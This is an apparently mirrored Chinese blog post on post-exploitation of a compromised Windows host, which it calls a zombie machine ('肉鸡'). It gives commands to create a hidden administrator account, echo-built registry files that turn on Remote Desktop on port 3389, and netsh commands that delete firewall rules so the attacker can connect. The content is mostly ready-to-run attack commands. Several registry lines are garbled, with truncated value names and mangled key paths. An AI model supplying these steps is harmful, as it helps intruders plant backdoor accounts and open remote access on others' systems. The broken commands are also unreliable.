zoukankan      html  css  js  c++  java

  • Windows提权与开启远程连接

    1.提权:

        建立普通用户:net user 帐户  密码 /add

    提权成管理员:net localgroup administrators 帐户 /add

    更改用户密码:net user  帐户  密码

    删除用户: net user 帐户 /del

    2.开启远程连接:

    windows2000 cmd下开3389

    echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
etcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds	cp] >>3389.reg
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg
echo "ortNumber"=dword:00000D3D >>3389.reg

    windows2003 CMD开3389:

    echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds	cp] >>3389.reg 
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
    在cmd中输入:regedit /s 3389.reg 导入注册表

    3.攻击机建立远程连接,如果连接不上,说明肉鸡开了防火墙,所以我们要删除防火墙的3389规则

        输入netsh firewall /?显示命令的用法
    应该会出现delete选项。这时再输入:netsh firewall delete。较新的版本应该只显示“下列命令有效:”就没了,这时我们应该换一个命令。如下

    输入netsh advfirewall firewall /?显示命令的用法
    也会出现delete选项。输入:netsh advfirewall firewall delete。显示“delete rule    - 删除所有匹配的防火墙规则。”
    按照提示,输入:netsh advfirewall firewall delete rule。这时会显示一场段的提示,这里我就不再粘贴了,提示的最后有事例,你可以看一下
    最后,直接用这个命令干掉(删除)防火墙对于3389端口设置的规则。 终极命令如下:

    netsh advfirewall firewall delete rule name=all protocol=tcp localport=3389

    bingo! 现在可以连上了吧?
  • 相关阅读:
    python从入门到实践-5章if语句
    HiveQL:文件格式和压缩方法
    HiveQL:调优
    HiveQL:模式设计
    HiveQL:视图
    (转)配置文件.bash_profile和.bashrc的区别
    Hive-学习总结(二)
    Hive-学习总结
    MYSQL-表类型(存储引擎)的选择
    MYSQL-常用函数
  • 原文地址:https://www.cnblogs.com/litlife/p/7702689.html
Copyright © 2011-2022 走看看